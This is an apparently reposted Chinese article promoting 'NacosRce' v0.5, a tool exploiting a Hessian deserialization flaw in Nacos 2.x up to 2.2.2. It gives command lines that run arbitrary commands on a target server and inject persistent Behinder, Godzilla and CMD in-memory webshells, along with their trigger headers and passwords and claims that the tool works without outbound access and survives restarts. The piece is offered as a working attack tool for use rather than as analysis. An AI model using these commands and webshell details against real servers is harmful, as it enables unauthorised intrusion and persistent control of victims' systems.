打开APP
userphoto
未登录

开通VIP,畅享免费电子书等14项超值服

开通VIP
6!Nacos反序列化漏洞利用工具v0.5
userphoto

2023.07.06 广东

关注
现在只对常读和星标的公众号才展示大图推送,建议大家把Hack分享吧“设为星标”,否则可能看不到了!
项目简介
刨洞安全@凉风 师傅写的一个 Nacos Hessian 反序列化漏洞利用工具,目前已更新到v0.5,欢迎Star!
使用方法
1. 自动注入内存马并执行命令 java -jar NacosRce.jar Url Jraft端口 'Command'
java -jar NacosRce.jar http://192.168.90.1:8848 7848 'whoami'
2. 只注入内存马
java -jar NacosRce.jar http://192.168.90.1:8848 7848 memshell一、冰蝎内存马:
需要设置请求头x-client-data:rebeyond
设置Referer:https://www.google.com/
路径随意
密码rebeyond
二、哥斯拉内存马:
需要设置请求头x-client-data:godzilla
设置Referer:https://www.google.com/
路径随意
密码是pass和key
三、CMD内存马:
需要设置请求头x-client-data:cmd
设置Referer:https://www.google.com/
请求头cmd:要执行的命令
v0.5版本实现了不出网漏洞利用
可多次发起漏洞利用
同时注入冰蝎/哥斯拉/CMD内存马
内存马对nacos多版本进行了兼容
修复windows的bug
tips:请用jdk1.8
适用于Nacos 2.x <= 2.2.2
非集群的也能打哦
此内存马重启nacos依然存活
注意事项
Windows如用下面的方式执行,注入内存马时会在以下目录生成两个临时文件
java -jar NacosRce.jar http://192.168.90.1:8848 7848 'whoami' windows
C:\Windows\Temp\nacos_data_tempC:\Windows\Temp\nacos_data_temp.class
如果没有在最后加windows,临时文件会在以下目录,所以权限足够的话,不指定windows也能打成功,没打成功也许是因为没权限操作C盘或其他原因
/tmp/nacos_data_temp/tmp/nacos_data_temp.class
下载地址
点击下方名片进入公众号
回复关键字【230706】获取下载链接
信 安 考 证
需要考以下各类安全证书的可以联系我,价格优惠、组团更便宜,还送【潇湘信安】知识星球1年!
CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP、ISO27001...
本站仅提供存储服务,所有内容均由用户发布,如发现有害或侵权内容,请点击举报
打开APP,阅读全文并永久保存 查看更多类似文章
猜你喜欢
类似文章
【热】打开小程序,算一算2024你的财运
Windows下使用cmd运行jar文件
不用补丁,让32位win7系统支持4G以上内存!!好方法!
电脑运行速度慢的原因及解决方法
从零开始学黑客新手入门
为什么C盘越来越占用空间大
电脑慢了~~怎么办~~
更多类似文章 >>
生活服务
热点新闻
分享 收藏 导长图 关注 下载文章
绑定账号成功
后续可登录账号畅享VIP特权!
如果VIP功能使用有故障,
可点击这里联系客服!

联系客服